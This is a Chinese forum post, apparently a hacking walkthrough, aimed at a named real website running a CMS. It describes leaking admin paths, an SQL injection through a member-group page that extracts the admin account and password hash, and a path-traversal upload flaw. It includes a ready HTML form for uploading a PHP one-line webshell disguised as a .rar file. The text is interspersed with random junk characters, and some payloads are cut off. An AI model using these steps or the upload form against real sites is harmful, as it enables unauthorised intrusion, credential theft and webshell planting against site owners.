①注入漏洞。
8 L; S B. r" R: x这站 http://www.political-security.com/7 Q' B7 _' L W, `
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
, ~! v2 ?4 O; @) O7 Dwww.political-security.com/data/mysql_error_trace.inc 爆后台& h' B( C+ T4 J
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。6 x4 l% v# `8 T. t8 z: }" m
然后写上语句 ; E- E/ G; L4 B8 Z* K7 }3 h5 o
查看管理员帐号
9 l/ M! Z2 Y) r9 Y$ x6 g, L% vhttp://www.political-security.co ... &membergroup=@`6 Z' N2 l9 ^. ]0 s
+ s- h7 t3 ~; u# ^% D% b3 g Sadmin
" p% E& K9 t+ v7 @+ s' f
8 \) f4 a a1 H8 H. u8 A查看管理员密码
1 O1 p3 z# X. G* O0 O http://www.political-security.co ... &membergroup=@`& Y D1 |3 c4 s* y. |) s9 M7 N
5 k' G0 U$ J) l
8d29b1ef9f8c5a5af4296 W1 \7 S. u/ t3 ?" {& Z
: G' b: S( ^" |查看管理员密码' `9 z) i' q; W% b! k$ R! K1 k
+ a3 Z% O; i2 G" Q. _
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD57 ]. q: J; G* @% s5 c
7 z) N2 T2 k1 m/ S' u" F3 v0 z8d2# M2 N! Z9 N8 r" W; I. R8 Z+ j
9b1ef9f8c5a5af422 F/ V# |. w1 ^7 g+ A
93 V) }0 h7 u# k+ w& e1 ]
0 J S- K* Q ~ Z' `2 B. o0 K2 v) rcmd5没解出来 只好测试第二个方法; y9 _4 O* G1 @1 h
4 s+ Z: G P/ A+ \! ~! ` m
2 D+ y' z3 P/ m% Q$ l* ]②上传漏洞:% v2 ]0 R; p r* @9 K1 c: a
0 a' q2 ^ `4 }2 b% U
只要登陆会员中心,然后访问页面链接
! z9 X7 c7 j& g O N“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
! H$ O3 `& X) B5 z9 @0 F! _" S9 j3 ?. o8 ~
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”6 H2 R) V4 M6 g
3 w$ f3 a0 ]! v% G3 J, x; V于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm; f5 y% v6 Q( m( Q
' X- F7 k) A: d+ Y! s- W
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
, E/ g$ e* u0 f* W7 M( a或者
3 c- E5 R! d: }8 m2 W* M即可上传成功 |